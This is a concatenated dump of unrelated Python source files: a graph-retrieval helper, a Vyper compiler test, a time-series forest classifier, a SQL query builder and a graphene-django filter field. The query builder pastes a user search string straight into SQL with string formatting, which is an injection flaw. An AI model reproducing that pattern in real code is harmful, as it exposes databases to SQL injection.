verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Marinimicrobium sp. LS-A18 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="MarinimicrobiumSpLsA18",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
|
py | 7dfd1f88b72e614bc131c0bba9884fe0a6303ce3 | #!/usr/bin/env python3
import vyper
from vyper.cli.vyper_json import format_to_output_dict
from vyper.compiler import OUTPUT_FORMATS, compile_codes
FOO_CODE = """
@public
def foo() -> bool:
return True
"""
def test_keys():
compiler_data = compile_codes({"foo.vy": FOO_CODE}, output_formats=list(OUTPUT_FORMATS.keys()))
output_json = format_to_output_dict(compiler_data)
assert sorted(output_json.keys()) == ["compiler", "contracts", "sources"]
assert output_json["compiler"] == f"vyper-{vyper.__version__}"
data = compiler_data["foo.vy"]
assert output_json["sources"]["foo.vy"] == {"id": 0, "ast": data["ast_dict"]["ast"]}
assert output_json["contracts"]["foo.vy"]["foo"] == {
"abi": data["abi"],
"devdoc": data["devdoc"],
"interface": data["interface"],
"ir": data["ir"],
"userdoc": data["userdoc"],
"evm": {
"bytecode": {"object": data["bytecode"], "opcodes": data["opcodes"]},
"deployedBytecode": {
"object": data["bytecode_runtime"],
"opcodes": data["opcodes_runtime"],
"sourceMap": data["source_map"]["pc_pos_map_compressed"],
},
"methodIdentifiers": data["method_identifiers"],
},
}
|
py | 7dfd1fe72bbcbb220381e5c91c69150ec4af0e44 | from warnings import warn
from warnings import catch_warnings
from warnings import simplefilter
import numpy as np
import pandas as pd
from scipy.sparse import issparse
from sklearn.ensemble.forest import ForestClassifier
from sklearn.ensemble.forest import MAX_INT
from sklearn.ensemble.forest import _generate_sample_indices
from sklearn.ensemble.forest import _generate_unsampled_indices
from sklearn.ensemble.base import _partition_estimators
from sklearn.utils._joblib import Parallel, delayed
from sklearn.tree._tree import DOUBLE
from sklearn.utils import check_random_state
from sklearn.utils import check_array
from sklearn.utils import compute_sample_weight
from sklearn.utils.validation import check_is_fitted
from sklearn.exceptions import DataConversionWarning
from sklearn.tree import DecisionTreeClassifier
from ..pipeline import Pipeline
from ..transformers.series_to_tabular import RandomIntervalFeatureExtractor
from ..utils.time_series import time_series_slope
__all__ = ["TimeSeriesForestClassifier"]
class TimeSeriesForestClassifier(ForestClassifier):
"""Time-Series Forest Classifier.
A time series forest is a meta estimator and an adaptation of the random forest
for time-series/panel data that fits a number of decision tree classifiers on
various sub-samples of a transformed dataset and uses averaging to improve the
predictive accuracy and control over-fitting. The sub-sample size is always the same as the original
input sample size but the samples are drawn with replacement if `bootstrap=True` (default).
Parameters
----------
base_estimator : Pipeline
A pipeline consisting of series-to-tabular transformers
and a decision tree classifier as final estimator.
n_estimators : integer, optional (default=100)
The number of trees in the forest.
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
Note: this parameter is tree-specific.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` training samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)` (same as "auto").
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, optional (default=0.)
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of samples, ``N_t`` is the number of
samples at the current node, ``N_t_L`` is the number of samples in the
left child, and ``N_t_R`` is the number of samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
min_impurity_split : float, (default=1e-7)
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
bootstrap : boolean, optional (default=True)
Whether bootstrap samples are used when building trees.
oob_score : bool (default=False)
Whether to use out-of-bag samples to estimate
the generalization accuracy.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for both `fit` and `predict`.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity when fitting and predicting.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
class_weight : dict, list of dicts, "balanced", "balanced_subsample" or \
None, optional (default=None)
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
Note that for multioutput (including multilabel) weights should be
defined for each class of every column in its own dict. For example,
for four-class multilabel classification weights should be
[{0: 1, 1: 1}, {0: 1, 1: 5}, {0: 1, 1: 1}, {0: 1, 1: 1}] instead of
[{1:1}, {2:5}, {3:1}, {4:1}].
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
The "balanced_subsample" mode is the same as "balanced" except that
weights are computed based on the bootstrap sample for every tree
grown.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
Attributes
----------
estimators_ : list of DecisionTreeClassifier
The collection of fitted sub-estimators.
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem), or a list of arrays of
class labels (multi-output problem).
n_classes_ : int or list
The number of classes (single output problem), or a list containing the
number of classes for each output (multi-output problem).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_decision_function_ : array of shape = [n_samples, n_classes]
Decision function computed with out-of-bag estimate on the training
set. If n_estimators is small it might be possible that a data point
was never left out during the bootstrap. In this case,
`oob_decision_function_` might contain NaN.
"""
def __init__(self,
base_estimator=None,
n_estimators=500,
criterion='entropy',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
max_leaf_nodes=None,
min_impurity_decrease=0.,
min_impurity_split=None,
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None,
check_input=True):
if base_estimator is None:
features = [np.mean, np.std, time_series_slope]
steps = [('transform', RandomIntervalFeatureExtractor(n_intervals='sqrt', features=features)),
('clf', DecisionTreeClassifier())]
base_estimator = Pipeline(steps)
elif not isinstance(base_estimator, Pipeline):
raise ValueError('Base estimator must be pipeline with transforms.')
elif not isinstance(base_estimator.steps[-1][1], DecisionTreeClassifier):
raise ValueError('Last step in base estimator pipeline must be DecisionTreeClassifier.')
# Rename estimator params according to name in pipeline.
estimator = base_estimator.steps[-1][0]
estimator_params = {
"criterion": criterion,
"max_depth": max_depth,
"min_samples_split": min_samples_split,
"min_samples_leaf": min_samples_leaf,
"min_weight_fraction_leaf": min_weight_fraction_leaf,
"max_features": max_features,
"max_leaf_nodes": max_leaf_nodes,
"min_impurity_decrease": min_impurity_decrease,
"min_impurity_split": min_impurity_split,
}
estimator_params = {f'{estimator}__{pname}': pval for pname, pval in estimator_params.items()}
# Pass on params.
super(TimeSeriesForestClassifier, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
estimator_params=tuple(estimator_params.keys()),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight
)
# Assign random state to pipeline.
base_estimator.set_params(**{'random_state': random_state, 'check_input': False})
# Store renamed estimator params.
for pname, pval in estimator_params.items():
self.__setattr__(pname, pval)
self.check_input = check_input
def fit(self, X, y, sample_weight=None):
"""Build a forest of trees from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The training input samples. Internally, its dtype will be converted
to ``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
Returns
-------
self : object
"""
# Validate or convert input data
if sample_weight is not None:
sample_weight = check_array(sample_weight, ensure_2d=False)
if issparse(X):
# Pre-sort indices to avoid that each individual tree of the
# ensemble sorts the indices.
X.sort_indices()
# Remap output
self.n_features_ = X.shape[1] if X.ndim == 2 else 1
y = np.atleast_1d(y)
if y.ndim == 2 and y.shape[1] == 1:
warn("A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples,), for example using ravel().",
DataConversionWarning, stacklevel=2)
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
y, expanded_class_weight = self._validate_y_class_weight(y)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Check parameters
self._validate_estimator()
if not self.bootstrap and self.oob_score:
raise ValueError("Out of bag estimation only available"
" if bootstrap=True")
random_state = check_random_state(self.random_state)
if not self.warm_start or not hasattr(self, "estimators_"):
# Free allocated memory, if any
self.estimators_ = []
n_more_estimators = self.n_estimators - len(self.estimators_)
if n_more_estimators < 0:
raise ValueError('n_estimators=%d must be larger or equal to '
'len(estimators_)=%d when warm_start==True'
% (self.n_estimators, len(self.estimators_)))
elif n_more_estimators == 0:
warn("Warm-start fitting without increasing n_estimators does not "
"fit new trees.")
else:
if self.warm_start and len(self.estimators_) > 0:
# We draw from the random state to get the random state we
# would have got if we hadn't used a warm_start.
random_state.randint(MAX_INT, size=len(self.estimators_))
trees = [self._make_estimator(append=False,
random_state=random_state)
for i in range(n_more_estimators)]
# Parallel loop: for standard random forests, the threading
# backend is preferred as the Cython code for fitting the trees
# is internally releasing the Python GIL making threading more
# efficient than multiprocessing in that case. However, in this case,
# for fitting pipelines in parallel, multiprocessing is more efficient.
trees = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_parallel_build_trees)(
t, self, X, y, sample_weight, i, len(trees),
verbose=self.verbose, class_weight=self.class_weight)
for i, t in enumerate(trees))
# Collect newly grown trees
self.estimators_.extend(trees)
if self.oob_score:
self._set_oob_score(X, y)
# Decapsulate classes_ attributes
if hasattr(self, "classes_") and self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
def predict_proba(self, X):
"""Predict class probabilities for X.
The predicted class probabilities of an input sample are computed as
the mean predicted class probabilities of the trees in the forest. The
class probability of a single tree is the fraction of samples of the same
class in a leaf.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
check_is_fitted(self, 'estimators_')
# Check data
if self.check_input:
X = self._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)
all_proba = Parallel(n_jobs=n_jobs, verbose=self.verbose)(delayed(e.predict_proba)(X) for e in self.estimators_)
all_proba = np.sum(all_proba, axis=0) / len(self.estimators_)
if len(all_proba) == 1:
return all_proba[0]
else:
return all_proba
def _validate_X_predict(self, X):
n_features = X.shape[1] if X.ndim == 2 else 1
if self.n_features_ != n_features:
raise ValueError("Number of features of the model must "
"match the input. Model n_features is %s and "
"input n_features is %s "
% (self.n_features_, n_features))
return X
def apply(self, X):
raise NotImplementedError()
def decision_path(self, X):
raise NotImplementedError()
@property
def feature_importances_(self):
raise NotImplementedError
def _set_oob_score(self, X, y):
"""Compute out-of-bag score"""
if X.ndim == 1:
X = pd.DataFrame(X)
n_classes_ = self.n_classes_
n_samples = y.shape[0]
oob_decision_function = []
oob_score = 0.0
predictions = [np.zeros((n_samples, n_classes_[k]))
for k in range(self.n_outputs_)]
for estimator in self.estimators_:
unsampled_indices = _generate_unsampled_indices(
estimator.random_state, n_samples)
p_estimator = estimator.predict_proba(X.iloc[unsampled_indices, :])
if self.n_outputs_ == 1:
p_estimator = [p_estimator]
for k in range(self.n_outputs_):
predictions[k][unsampled_indices, :] += p_estimator[k]
for k in range(self.n_outputs_):
if (predictions[k].sum(axis=1) == 0).any():
warn("Some inputs do not have OOB scores. "
"This probably means too few trees were used "
"to compute any reliable oob estimates.")
decision = (predictions[k] /
predictions[k].sum(axis=1)[:, np.newaxis])
oob_decision_function.append(decision)
oob_score += np.mean(y[:, k] ==
np.argmax(predictions[k], axis=1), axis=0)
if self.n_outputs_ == 1:
self.oob_decision_function_ = oob_decision_function[0]
else:
self.oob_decision_function_ = oob_decision_function
self.oob_score_ = oob_score / self.n_outputs_
def _parallel_build_trees(tree, forest, X, y, sample_weight, tree_idx, n_trees,
verbose=0, class_weight=None):
"""Private function used to fit a single tree in parallel, adjusted for pipeline trees."""
if verbose > 1:
print("building tree %d of %d" % (tree_idx + 1, n_trees))
# name of step of final estimator in pipeline
estimator = tree.steps[-1][0]
if forest.bootstrap:
n_samples = X.shape[0]
if sample_weight is None:
curr_sample_weight = np.ones((n_samples,), dtype=np.float64)
else:
curr_sample_weight = sample_weight.copy()
indices = _generate_sample_indices(tree.random_state, n_samples)
sample_counts = np.bincount(indices, minlength=n_samples)
curr_sample_weight *= sample_counts
if class_weight == 'subsample':
with catch_warnings():
simplefilter('ignore', DeprecationWarning)
curr_sample_weight *= compute_sample_weight('auto', y, indices)
elif class_weight == 'balanced_subsample':
curr_sample_weight *= compute_sample_weight('balanced', y, indices)
fit_params = {f'{estimator}__sample_weight': curr_sample_weight,
f'{estimator}__check_input': True}
tree.fit(X, y, **fit_params)
else:
fit_params = {f'{estimator}__sample_weight': sample_weight,
f'{estimator}__check_input': True}
tree.fit(X, y, **fit_params)
return tree
|
py | 7dfd1ff6e389c8f5add8b822981770d6bac63a81 | def getQueryBySearchNameFormulaOrCas(s: str) -> str:
table_name = "v_all_properties_including_correlations s"
table_name += " INNER JOIN substance sub ON sub.cas=s.cas LEFT JOIN substance_name_aliases a on sub.substance_id=a.substance_id"
query = """SELECT DISTINCT s.formula, s.name, s.cas, s.molar_weigth,
s.tfp_k, s.tb_k, s.tc_k, s.pc_bar, s.vc_cm3_per_mol, s.zc, s.omega,
s.cp_trange, s.cp_a0, s.cp_a1, s.cp_a2, s.cp_a3, s.cp_a4, s.cpig, s.cpliq,
s.antoine_a, s.antoine_b, s.antoine_c, s.pvpmin_bar, s.tmin_k, s.pvpmax_bar, s.tmax_k
FROM {0}
WHERE s.name LIKE '%{1}%'
OR s.formula LIKE '%{1}%'
OR s.cas LIKE '%{1}%'
OR a.alias LIKE '%{1}%'
ORDER BY (s.name='{1}') DESC, length(s.name)""".format(
table_name, s
)
return query
|
py | 7dfd20a12a9b0978b0a76e1f0262c94ac48cd953 | from collections import OrderedDict
from functools import partial
from graphql.error import GraphQLError
from graphene.types.argument import to_arguments
from ..fields import DjangoConnectionField
from .utils import get_filtering_args_from_filterset, get_filterset_class
class DjangoFilterConnectionField(DjangoConnectionField):
def __init__(
self,
type,
fields=None,
order_by=None,
extra_filter_meta=None,
filterset_class=None,
*args,
**kwargs
):
self._fields = fields
self._provided_filterset_class = filterset_class
self._filterset_class = None
self._extra_filter_meta = extra_filter_meta
self._base_args = None
super(DjangoFilterConnectionField, self).__init__(type, *args, **kwargs)
@property
def args(self):
return to_arguments(self._base_args or OrderedDict(), self.filtering_args)
@args.setter
def args(self, args):
self._base_args = args
@property
def filterset_class(self):
if not self._filterset_class:
fields = self._fields or self.node_type._meta.filter_fields
meta = dict(model=self.model, fields=fields)
if self._extra_filter_meta:
meta.update(self._extra_filter_meta)
self._filterset_class = get_filterset_class(
self._provided_filterset_class, **meta
)
return self._filterset_class
@property
def filtering_args(self):
return get_filtering_args_from_filterset(self.filterset_class, self.node_type)
@classmethod
def merge_querysets(cls, default_queryset, queryset):
# There could be the case where the default queryset (returned from the filterclass)
# and the resolver queryset have some limits on it.
# We only would be able to apply one of those, but not both
# at the same time.
# See related PR: https://github.com/graphql-python/graphene-django/pull/126
assert not (
default_queryset.query.low_mark and queryset.query.low_mark
), "Received two sliced querysets (low mark) in the connection, please slice only in one."
assert not (
default_queryset.query.high_mark and queryset.query.high_mark
), "Received two sliced querysets (high mark) in the connection, please slice only in one."
low = default_queryset.query.low_mark or queryset.query.low_mark
high = default_queryset.query.high_mark or queryset.query.high_mark
default_queryset.query.clear_limits()
queryset = super(DjangoFilterConnectionField, cls).merge_querysets(
default_queryset, queryset
)
queryset.query.set_limits(low, high)
return queryset
@classmethod
def connection_resolver(
cls,
resolver,
connection,
default_manager,
max_limit,
enforce_first_or_last,
filterset_class,
filtering_args,
root,
info,
**args
):
filter_kwargs = {k: v for k, v in args.items() if k in filtering_args}
filterset = filterset_class(
data=filter_kwargs,
queryset=default_manager.get_queryset(),
request=info.context,
)
if not (filterset.is_bound and filterset.form.is_valid()):
exc = {
str(key): [str(e.message) for e in error_list]
for key, error_list in filterset.form.errors.as_data().items()
}
raise GraphQLError(exc)
qs = filterset.qs
return super(DjangoFilterConnectionField, cls).connection_resolver(
resolver,
connection,
qs,
max_limit,
enforce_first_or_last,
root,
info,
**args
)
def get_resolver(self, parent_resolver):
return partial(
self.connection_resolver,
parent_resolver,
self.type,
self.get_manager(),
self.max_limit,
self.enforce_first_or_last,
self.filterset_class,
self.filtering_args,
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.